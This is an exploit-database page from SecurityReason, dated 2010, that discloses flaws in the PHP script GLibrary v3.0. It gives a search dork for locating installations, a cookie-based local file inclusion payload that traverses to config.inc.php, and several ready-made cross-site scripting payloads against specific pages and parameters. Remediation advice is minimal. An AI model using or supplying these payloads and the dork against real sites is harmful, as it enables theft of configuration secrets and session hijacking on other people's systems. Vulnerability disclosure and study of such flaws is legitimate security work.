|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7921 Credit : Br0k3n-H34rT Date : 10.03.2010 Exploit Code : [+]-------------------------------------[+] [+] Title : GLibrary v3.0 Multiple Remote vulnerabilities [+] Homepage: http://www.ac4p.com/ [+] Download: http://www.mnzo3.com/vb/attachment.php?attachmentid=548&d=1235909502 [+] Dork : "Powered by GLibrary v3.0" [+] Parameter: Cookie , GET , POST [+]-------------------------------------[+] [+] Discovered by Br0k3n-H34rT [+] My Homepage : WwW.W-Dev.CoM [+] Original Link : http://www.w-dev.com/My_Lap/GLibraryv3.0.txt [+] My Note : Every Thingz Can Develop It,z , When We Think About It,z [+]-------------------------------------[+] [+] [1]: Local File Include : [+] LFI is a vulnerability which allows attackers to access restricted directories. [+] # Note : [+] This Is Work If magic_quotes_gpc Be Off In PHP Setting (Regardless php.ini). [+] # Affected Files : [+] /games/ [+] /games/index.php [+] /games/play.php [+] /games/register.php [+] # Affected Variable : [+] ccthemes <<< That,s Responsiple To Change Theme In Script . [+] # Parameter : [+] Cookie . [+] # e.g. : [+] ccthemes=../config.inc.php%00;PHPSESSID=85e84cb4eb390dd364301e3eb86c44f 0;ac4pgame=1 [+] # How to fix this vulnerability : [+] See Below .... [+]-------------------------------------[+]] [+] [2]: Cross Site Scripting : [+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. [+] # Affected Files : [+] /games/ [+] /games/comment.php [+] /games/index.php [+] /games/play.php [+] /games/register.php [+] /games/tags.php [+] # Affected Variable : [+] ccthemes <<< That,s Responsiple To Change Theme In Script [+] cat <<< To Catgories [+] email <<< to send email in registeration [+] a <<< in tags file [+] PHP_SELF <<< /index.php/ [+] # Parameter : [+] Cookie , GET , POST . [+] # e.g. : [+] In Cookies : ccthemes=1>'><script%20%0d%0a>alert('Br0k3n-H34rT Was Here')%3B</script>;PHPSESSID=85e84cb4eb390dd364301e3eb86c44f0;ac4pgame=1 [+] http://localhost/games/comment.php?id=1&cat=1"+onmouseover=alert('Br0k3n-H3 4rT Was Here')+ [+] http://localhost/games/tags.php?a=1"+onmouseover=alert('Br0k3n-H34rT Was Here')+&page=0 [+] http://localhost/games/register.php In Email Box Set : 1>'><script%20%0d%0a>alert('Br0k3n-H34rT Was Here')%3B</script> [+] http://localhost/games/index.php/>"><script>alert('Br0k3n Was Here')</script> [+] # How to fix this vulnerabilities : [+] Just I Fixed LFI ... You Can Fixed The XSS ... Just Replace File [+]-------------------------------------[+] [+] Greetz to : [+] a?0x4Li ??R?i0r , L0v3Rd0 , DIES3L , albta ... ETC [+]-------------------------------------[+] _________________________________________________________________  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |